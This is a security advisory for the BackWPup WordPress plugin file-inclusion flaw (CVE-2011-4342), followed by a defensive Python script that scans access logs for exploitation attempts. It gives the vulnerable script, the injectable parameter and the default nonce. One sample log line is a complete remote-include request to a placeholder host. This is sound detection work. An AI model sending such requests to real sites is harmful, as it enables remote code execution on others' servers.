WordPress Plugin BackWPup Remote and Local Code Execution - CVE-2011-4342
WordPress Plugin BackWPup is prone to a vulnerability that can be exploited to execute local or remote code on the web server. Input passed to the component wp_xml_export.php via the wpabs variable allows the inclusion and execution of local or remote PHP files as long as a _nonce value is known. The _nonce value relies on a static constant that is not defined in the script, so it defaults to the value 822728c8d9. WordPress Plugin BackWPup version 1.6.1 is vulnerable; other versions may also be affected.
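
For log review on sites that ran the affected version, the following added example (not part of the original advisory or the plugin's code) scans web server access log lines for requests to wp_xml_export.php that carry a wpabs value, and notes whether the default _nonce was supplied. It assumes common/combined log format, that both values appear in the logged query string under the names wpabs and _nonce, and uses constructed sample lines with a placeholder directory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Values taken from the advisory text.
TARGET_SCRIPT = "wp_xml_export.php"
INCLUDE_PARAM = "wpabs"
DEFAULT_NONCE = "822728c8d9"

# Request line and status of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# URL scheme or stream wrapper prefix (two or more characters, so a Windows
# drive letter such as C: is still treated as a local path).
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]+:", re.IGNORECASE)


def inspect_line(line):
    """Return a finding dict for a request that sets wpabs on the script, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # Match on the file name only; the install directory varies per site.
    if url.path.rsplit("/", 1)[-1].lower() != TARGET_SCRIPT:
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    if INCLUDE_PARAM not in params:
        return None
    value = params[INCLUDE_PARAM][0]
    return {
        "client": line.split(" ", 1)[0],
        "status": int(m.group("status")),
        "include_kind": "remote" if SCHEME_RE.match(value) else "local",
        "default_nonce": DEFAULT_NONCE in params.get("_nonce", []),
    }


def scan(lines):
    """Return findings for every matching line, in input order."""
    return [f for f in map(inspect_line, lines) if f]


# Constructed sample log lines (documentation addresses, placeholder directory).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2012:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2012:10:00:05 +0000] "GET /PLUGIN_DIR/wp_xml_export.php?_nonce=822728c8d9&wpabs=http%3A%2F%2Fhost.invalid%2F HTTP/1.1" 200 0',
    '203.0.113.4 - - [01/Jan/2012:10:00:09 +0000] "GET /PLUGIN_DIR/wp_xml_export.php?_nonce=abc&wpabs=%2Ftmp%2F HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Requests that submit these values in a POST body do not appear in standard access logs, so an empty result does not rule out exploitation.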